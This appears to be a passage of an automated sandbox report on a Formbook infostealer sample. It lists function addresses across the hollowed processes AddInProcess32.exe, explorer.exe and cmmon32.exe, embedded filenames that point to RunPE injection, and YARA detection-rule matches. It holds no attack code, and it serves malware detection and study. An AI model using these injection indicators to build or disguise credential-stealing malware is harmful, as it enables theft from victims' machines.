          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 3_2_018581583_2_01858158
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 3_2_018620003_2_01862000
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 3_2_018903E63_2_018903E6
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 3_2_017DE3F03_2_017DE3F0
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 3_2_0188A3523_2_0188A352
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 3_2_018502C03_2_018502C0
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 3_2_018702743_2_01870274
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 3_2_018905913_2_01890591
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 3_2_017D05353_2_017D0535
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 3_2_0187E4F63_2_0187E4F6
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 3_2_018744203_2_01874420
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 3_2_018824463_2_01882446
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 3_2_017D07703_2_017D0770
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 3_2_017F47503_2_017F4750
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 3_2_017CC7C03_2_017CC7C0
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 3_2_017EC6E03_2_017EC6E0
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 3_2_017E69623_2_017E6962
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 3_2_0189A9A63_2_0189A9A6
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 3_2_017D29A03_2_017D29A0
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 3_2_017D28403_2_017D2840
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 3_2_017DA8403_2_017DA840
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 3_2_017FE8F03_2_017FE8F0
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 3_2_017B68B83_2_017B68B8
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 3_2_01886BD73_2_01886BD7
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 3_2_0188AB403_2_0188AB40
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 3_2_017CEA803_2_017CEA80
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 3_2_017DAD003_2_017DAD00
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 3_2_0186CD1F3_2_0186CD1F
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 3_2_017CADE03_2_017CADE0
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 3_2_017E8DBF3_2_017E8DBF
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 3_2_01870CB53_2_01870CB5
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 3_2_017D0C003_2_017D0C00
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 3_2_017C0CF23_2_017C0CF2
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 3_2_0184EFA03_2_0184EFA0
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 3_2_017F0F303_2_017F0F30
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 3_2_017DCFE03_2_017DCFE0
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 3_2_01812F283_2_01812F28
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 3_2_017C2FC83_2_017C2FC8
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 3_2_01872F303_2_01872F30
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 3_2_01844F403_2_01844F40
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 3_2_0188CE933_2_0188CE93
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 3_2_017D0E593_2_017D0E59
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 3_2_0188EEDB3_2_0188EEDB
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 3_2_0188EE263_2_0188EE26
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 3_2_017E2E903_2_017E2E90
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 3_2_017BF1723_2_017BF172
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 3_2_017DB1B03_2_017DB1B0
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 3_2_0189B16B3_2_0189B16B
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 3_2_0180516C3_2_0180516C
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 3_2_0187F0CC3_2_0187F0CC
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 3_2_018870E93_2_018870E9
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 3_2_0188F0E03_2_0188F0E0
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 3_2_017D70C03_2_017D70C0
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 3_2_0181739A3_2_0181739A
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 3_2_017BD34C3_2_017BD34C
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 3_2_0188132D3_2_0188132D
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe | Code function: 3_2_018712ED
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe | Code function: 3_2_017EB2C0
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe | Code function: 3_2_017D52A0
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe | Code function: 3_2_0186D5B0
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe | Code function: 3_2_01887571
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe | Code function: 3_2_017C1460
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe | Code function: 3_2_0188F43F
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe | Code function: 3_2_0188F7B0
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe | Code function: 3_2_018816CC
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe | Code function: 3_2_017D9950
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe | Code function: 3_2_017EB950
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe | Code function: 3_2_01865910
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe | Code function: 3_2_0183D800
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe | Code function: 3_2_017D38E0
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe | Code function: 3_2_01845BF0
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe | Code function: 3_2_0180DBF9
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe | Code function: 3_2_0188FB76
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe | Code function: 3_2_017EFB80
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe | Code function: 3_2_01815AA0
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe | Code function: 3_2_01871AA3
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe | Code function: 3_2_0186DAAC
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe | Code function: 3_2_0187DAC6
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe | Code function: 3_2_0188FA49
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe | Code function: 3_2_01887A46
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe | Code function: 3_2_01843A6C
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe | Code function: 3_2_017D3D40
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe | Code function: 3_2_017EFDC0
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe | Code function: 3_2_01881D5A
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe | Code function: 3_2_01887D73
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe | Code function: 3_2_0188FCF2
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe | Code function: 3_2_01849C32
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe | Code function: 3_2_0188FFB1
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe | Code function: 3_2_0188FF09
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe | Code function: 3_2_01793FD2
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe | Code function: 3_2_01793FD5
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe | Code function: 3_2_017D1F92
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe | Code function: 3_2_017D9EB0
          Source: C:\Windows\explorer.exe | Code function: 4_2_10422036
          Source: C:\Windows\explorer.exe | Code function: 4_2_10419082
          Source: C:\Windows\explorer.exe | Code function: 4_2_1041AD02
          Source: C:\Windows\explorer.exe | Code function: 4_2_10420912
          Source: C:\Windows\explorer.exe | Code function: 4_2_104265CD
          Source: C:\Windows\explorer.exe | Code function: 4_2_10423232
          Source: C:\Windows\explorer.exe | Code function: 4_2_1041DB30
          Source: C:\Windows\explorer.exe | Code function: 4_2_1041DB32
          Source: C:\Windows\explorer.exe | Code function: 4_2_10F75232
          Source: C:\Windows\explorer.exe | Code function: 4_2_10F6B082
          Source: C:\Windows\explorer.exe | Code function: 4_2_10F74036
          Source: C:\Windows\explorer.exe | Code function: 4_2_10F785CD
          Source: C:\Windows\explorer.exe | Code function: 4_2_10F6FB32
          Source: C:\Windows\explorer.exe | Code function: 4_2_10F6FB30
          Source: C:\Windows\explorer.exe | Code function: 4_2_10F72912
          Source: C:\Windows\explorer.exe | Code function: 4_2_10F6CD02
          Source: C:\Windows\SysWOW64\cmmon32.exe | Code function: 5_2_04442446
          Source: C:\Windows\SysWOW64\cmmon32.exe | Code function: 5_2_04434420
          Source: C:\Windows\SysWOW64\cmmon32.exe | Code function: 5_2_0443E4F6
          Source: C:\Windows\SysWOW64\cmmon32.exe | Code function: 5_2_04390535
          Source: C:\Windows\SysWOW64\cmmon32.exe | Code function: 5_2_04450591
          Source: C:\Windows\SysWOW64\cmmon32.exe | Code function: 5_2_043AC6E0
          Source: C:\Windows\SysWOW64\cmmon32.exe | Code function: 5_2_04390770
          Source: C:\Windows\SysWOW64\cmmon32.exe | Code function: 5_2_043B4750
          Source: C:\Windows\SysWOW64\cmmon32.exe | Code function: 5_2_0438C7C0
          Source: C:\Windows\SysWOW64\cmmon32.exe | Code function: 5_2_04422000
          Source: C:\Windows\SysWOW64\cmmon32.exe | Code function: 5_2_04418158
          Source: C:\Windows\SysWOW64\cmmon32.exe | Code function: 5_2_04380100
          Source: C:\Windows\SysWOW64\cmmon32.exe | Code function: 5_2_0442A118
          Source: C:\Windows\SysWOW64\cmmon32.exe | Code function: 5_2_044481CC
          Source: C:\Windows\SysWOW64\cmmon32.exe | Code function: 5_2_044441A2
          Source: C:\Windows\SysWOW64\cmmon32.exe | Code function: 5_2_044501AA
          Source: C:\Windows\SysWOW64\cmmon32.exe | Code function: 5_2_04430274
          Source: C:\Windows\SysWOW64\cmmon32.exe | Code function: 5_2_044102C0
          Source: C:\Windows\SysWOW64\cmmon32.exe | Code function: 5_2_0444A352
          Source: C:\Windows\SysWOW64\cmmon32.exe | Code function: 5_2_044503E6
          Source: C:\Windows\SysWOW64\cmmon32.exe | Code function: 5_2_0439E3F0
          Source: C:\Windows\SysWOW64\cmmon32.exe | Code function: 5_2_04390C00
          Source: C:\Windows\SysWOW64\cmmon32.exe | Code function: 5_2_04380CF2
          Source: C:\Windows\SysWOW64\cmmon32.exe | Code function: 5_2_04430CB5
          Source: C:\Windows\SysWOW64\cmmon32.exe | Code function: 5_2_0439AD00
          Source: C:\Windows\SysWOW64\cmmon32.exe | Code function: 5_2_0442CD1F
          Source: C:\Windows\SysWOW64\cmmon32.exe | Code function: 5_2_043A8DBF
          Source: C:\Windows\SysWOW64\cmmon32.exe | Code function: 5_2_0438ADE0
          Source: C:\Windows\SysWOW64\cmmon32.exe | Code function: 5_2_04390E59
          Source: C:\Windows\SysWOW64\cmmon32.exe | Code function: 5_2_0444EE26
          Source: C:\Windows\SysWOW64\cmmon32.exe | Code function: 5_2_0444EEDB
          Source: C:\Windows\SysWOW64\cmmon32.exe | Code function: 5_2_043A2E90
          Source: C:\Windows\SysWOW64\cmmon32.exe | Code function: 5_2_0444CE93
          Source: C:\Windows\SysWOW64\cmmon32.exe | Code function: 5_2_04404F40
          Source: C:\Windows\SysWOW64\cmmon32.exe | Code function: 5_2_043B0F30
          Source: C:\Windows\SysWOW64\cmmon32.exe | Code function: 5_2_043D2F28
          Source: C:\Windows\SysWOW64\cmmon32.exe | Code function: 5_2_04432F30
          Source: C:\Windows\SysWOW64\cmmon32.exe | Code function: 5_2_0439CFE0
          Source: C:\Windows\SysWOW64\cmmon32.exe | Code function: 5_2_0440EFA0
          Source: C:\Windows\SysWOW64\cmmon32.exe | Code function: 5_2_04382FC8
          Source: C:\Windows\SysWOW64\cmmon32.exe | Code function: 5_2_04392840
          Source: C:\Windows\SysWOW64\cmmon32.exe | Code function: 5_2_0439A840
          Source: C:\Windows\SysWOW64\cmmon32.exe | Code function: 5_2_043768B8
          Source: C:\Windows\SysWOW64\cmmon32.exe | Code function: 5_2_043BE8F0
          Source: C:\Windows\SysWOW64\cmmon32.exe | Code function: 5_2_043A6962
          Source: C:\Windows\SysWOW64\cmmon32.exe | Code function: 5_2_043929A0
          Source: C:\Windows\SysWOW64\cmmon32.exe | Code function: 5_2_0445A9A6
          Source: C:\Windows\SysWOW64\cmmon32.exe | Code function: 5_2_0438EA80
          Source: C:\Windows\SysWOW64\cmmon32.exe | Code function: 5_2_0444AB40
          Source: C:\Windows\SysWOW64\cmmon32.exe | Code function: 5_2_04446BD7
          Source: C:\Windows\SysWOW64\cmmon32.exe | Code function: 5_2_04381460
          Source: C:\Windows\SysWOW64\cmmon32.exe | Code function: 5_2_0444F43F
          Source: C:\Windows\SysWOW64\cmmon32.exe | Code function: 5_2_04447571
          Source: C:\Windows\SysWOW64\cmmon32.exe | Code function: 5_2_044595C3
          Source: C:\Windows\SysWOW64\cmmon32.exe | Code function: 5_2_0442D5B0
          Source: C:\Windows\SysWOW64\cmmon32.exe | Code function: 5_2_043D5630
          Source: C:\Windows\SysWOW64\cmmon32.exe | Code function: 5_2_044416CC
          Source: C:\Windows\SysWOW64\cmmon32.exe | Code function: 5_2_0444F7B0
          Source: C:\Windows\SysWOW64\cmmon32.exe | Code function: 5_2_0443F0CC
          Source: C:\Windows\SysWOW64\cmmon32.exe | Code function: 5_2_0444F0E0
          Source: C:\Windows\SysWOW64\cmmon32.exe | Code function: 5_2_044470E9
          Source: C:\Windows\SysWOW64\cmmon32.exe | Code function: 5_2_043970C0
          Source: C:\Windows\SysWOW64\cmmon32.exe | Code function: 5_2_0445B16B
          Source: C:\Windows\SysWOW64\cmmon32.exe | Code function: 5_2_0437F172
          Source: C:\Windows\SysWOW64\cmmon32.exe | Code function: 5_2_043C516C
          Source: C:\Windows\SysWOW64\cmmon32.exe | Code function: 5_2_0439B1B0
          Source: C:\Windows\SysWOW64\cmmon32.exe | Code function: 5_2_043952A0
          Source: C:\Windows\SysWOW64\cmmon32.exe | Code function: 5_2_044312ED
          Source: C:\Windows\SysWOW64\cmmon32.exe | Code function: 5_2_043AB2C0
          Source: C:\Windows\SysWOW64\cmmon32.exe | Code function: 5_2_0444132D
          Source: C:\Windows\SysWOW64\cmmon32.exe | Code function: 5_2_0437D34C
          Source: C:\Windows\SysWOW64\cmmon32.exe | Code function: 5_2_043D739A
          Source: C:\Windows\SysWOW64\cmmon32.exe | Code function: 5_2_04409C32
          Source: C:\Windows\SysWOW64\cmmon32.exe | Code function: 5_2_0444FCF2
          Source: C:\Windows\SysWOW64\cmmon32.exe | Code function: 5_2_04441D5A
          Source: C:\Windows\SysWOW64\cmmon32.exe | Code function: 5_2_04447D73
          Source: C:\Windows\SysWOW64\cmmon32.exe | Code function: 5_2_04393D40
          Source: C:\Windows\SysWOW64\cmmon32.exe | Code function: 5_2_043AFDC0
          Source: C:\Windows\SysWOW64\cmmon32.exe | Code function: 5_2_04399EB0
          Source: C:\Windows\SysWOW64\cmmon32.exe | Code function: 5_2_0444FF09
          Source: C:\Windows\SysWOW64\cmmon32.exe | Code function: 5_2_04391F92
          Source: C:\Windows\SysWOW64\cmmon32.exe | Code function: 5_2_04353FD5
          Source: C:\Windows\SysWOW64\cmmon32.exe | Code function: 5_2_04353FD2
          Source: C:\Windows\SysWOW64\cmmon32.exe | Code function: 5_2_0444FFB1
          Source: C:\Windows\SysWOW64\cmmon32.exe | Code function: 5_2_043FD800
          Source: C:\Windows\SysWOW64\cmmon32.exe | Code function: 5_2_043938E0
          Source: C:\Windows\SysWOW64\cmmon32.exe | Code function: 5_2_04425910
          Source: C:\Windows\SysWOW64\cmmon32.exe | Code function: 5_2_04399950
          Source: C:\Windows\SysWOW64\cmmon32.exe | Code function: 5_2_043AB950
          Source: C:\Windows\SysWOW64\cmmon32.exe | Code function: 5_2_04447A46
          Source: C:\Windows\SysWOW64\cmmon32.exe | Code function: 5_2_0444FA49
          Source: C:\Windows\SysWOW64\cmmon32.exe | Code function: 5_2_04403A6C
          Source: C:\Windows\SysWOW64\cmmon32.exe | Code function: 5_2_0443DAC6
          Source: C:\Windows\SysWOW64\cmmon32.exe | Code function: 5_2_043D5AA0
          Source: C:\Windows\SysWOW64\cmmon32.exe | Code function: 5_2_04431AA3
          Source: C:\Windows\SysWOW64\cmmon32.exe | Code function: 5_2_0442DAAC
          Source: C:\Windows\SysWOW64\cmmon32.exe | Code function: 5_2_0444FB76
          Source: C:\Windows\SysWOW64\cmmon32.exe | Code function: 5_2_04405BF0
          Source: C:\Windows\SysWOW64\cmmon32.exe | Code function: 5_2_043AFB80
          Source: C:\Windows\SysWOW64\cmmon32.exe | Code function: 5_2_043CDBF9
          Source: C:\Windows\SysWOW64\cmmon32.exe | Code function: 5_2_024AE5CB
          Source: C:\Windows\SysWOW64\cmmon32.exe | Code function: 5_2_024AD856
          Source: C:\Windows\SysWOW64\cmmon32.exe | Code function: 5_2_024AE8F7
          Source: C:\Windows\SysWOW64\cmmon32.exe | Code function: 5_2_02499E60
          Source: C:\Windows\SysWOW64\cmmon32.exe | Code function: 5_2_02499E1A
          Source: C:\Windows\SysWOW64\cmmon32.exe | Code function: 5_2_024ADF94
          Source: C:\Windows\SysWOW64\cmmon32.exe | Code function: 5_2_02492FB0
          Source: C:\Windows\SysWOW64\cmmon32.exe | Code function: 5_2_024AEC18
          Source: C:\Windows\SysWOW64\cmmon32.exe | Code function: 5_2_024ADD44
          Source: C:\Windows\SysWOW64\cmmon32.exe | Code function: 5_2_02492D8A
          Source: C:\Windows\SysWOW64\cmmon32.exe | Code function: 5_2_02492D90
          Source: C:\Windows\SysWOW64\cmmon32.exe | Code function: 5_2_041FA036
          Source: C:\Windows\SysWOW64\cmmon32.exe | Code function: 5_2_041F2D02
          Source: C:\Windows\SysWOW64\cmmon32.exe | Code function: 5_2_041FE5CD
          Source: C:\Windows\SysWOW64\cmmon32.exe | Code function: 5_2_041F1082
          Source: C:\Windows\SysWOW64\cmmon32.exe | Code function: 5_2_041F8912
          Source: C:\Windows\SysWOW64\cmmon32.exe | Code function: 5_2_041FB232
          Source: C:\Windows\SysWOW64\cmmon32.exe | Code function: 5_2_041F5B32
          Source: C:\Windows\SysWOW64\cmmon32.exe | Code function: 5_2_041F5B30
          Source: C:\Windows\SysWOW64\cmmon32.exe | Code function: String function: 001F554A appears 43 times
          Source: C:\Windows\SysWOW64\cmmon32.exe | Code function: String function: 0440F290 appears 105 times
          Source: C:\Windows\SysWOW64\cmmon32.exe | Code function: String function: 043FEA12 appears 86 times
          Source: C:\Windows\SysWOW64\cmmon32.exe | Code function: String function: 0437B970 appears 280 times
          Source: C:\Windows\SysWOW64\cmmon32.exe | Code function: String function: 043C5130 appears 58 times
          Source: C:\Windows\SysWOW64\cmmon32.exe | Code function: String function: 001F65D7 appears 33 times
          Source: C:\Windows\SysWOW64\cmmon32.exe | Code function: String function: 043D7E54 appears 111 times
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe | Code function: String function: 017BB970 appears 280 times
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe | Code function: String function: 01817E54 appears 102 times
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe | Code function: String function: 01805130 appears 58 times
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe | Code function: String function: 0183EA12 appears 86 times
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe | Code function: String function: 0184F290 appears 105 times
          Source: C:\Windows\explorer.exe | Process created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -u -p 4084 -s 3228
          Source: VFylJFPzqX.exe, 00000000.00000000.1405625354.0000000000198000.00000002.00000001.01000000.00000003.sdmp | Binary or memory string: OriginalFilenameICQ.exe0 vs VFylJFPzqX.exe
          Source: VFylJFPzqX.exe, 00000000.00000002.1487301628.0000000005801000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameAddInProcess32.exeT vs VFylJFPzqX.exe
          Source: VFylJFPzqX.exe, 00000000.00000002.1486863721.00000000055F0000.00000004.08000000.00040000.00000000.sdmp | Binary or memory string: OriginalFilenameSbKopBnfhlkIJ.dll< vs VFylJFPzqX.exe
          Source: VFylJFPzqX.exe, 00000000.00000002.1485081729.0000000003571000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameSbKopBnfhlkIJ.dll< vs VFylJFPzqX.exe
          Source: VFylJFPzqX.exe, 00000000.00000002.1468193156.00000000006FE000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameclr.dllT vs VFylJFPzqX.exe
          Source: VFylJFPzqX.exe, 00000000.00000002.1489902249.0000000007520000.00000004.08000000.00040000.00000000.sdmp | Binary or memory string: OriginalFilenameRunPe2-(dll).dll: vs VFylJFPzqX.exe
          Source: VFylJFPzqX.exe | Binary or memory string: OriginalFilenameICQ.exe0 vs VFylJFPzqX.exe
          Source: 3.2.AddInProcess32.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 3.2.AddInProcess32.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 3.2.AddInProcess32.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 3.2.AddInProcess32.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 3.2.AddInProcess32.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 3.2.AddInProcess32.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000003.00000002.1518903340.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 00000003.00000002.1518903340.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000003.00000002.1518903340.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000005.00000002.2667218858.0000000004120000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 00000005.00000002.2667218858.0000000004120000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000005.00000002.2667218858.0000000004120000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000000.00000002.1485081729.0000000003683000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 00000000.00000002.1485081729.0000000003683000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000000.00000002.1485081729.0000000003683000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
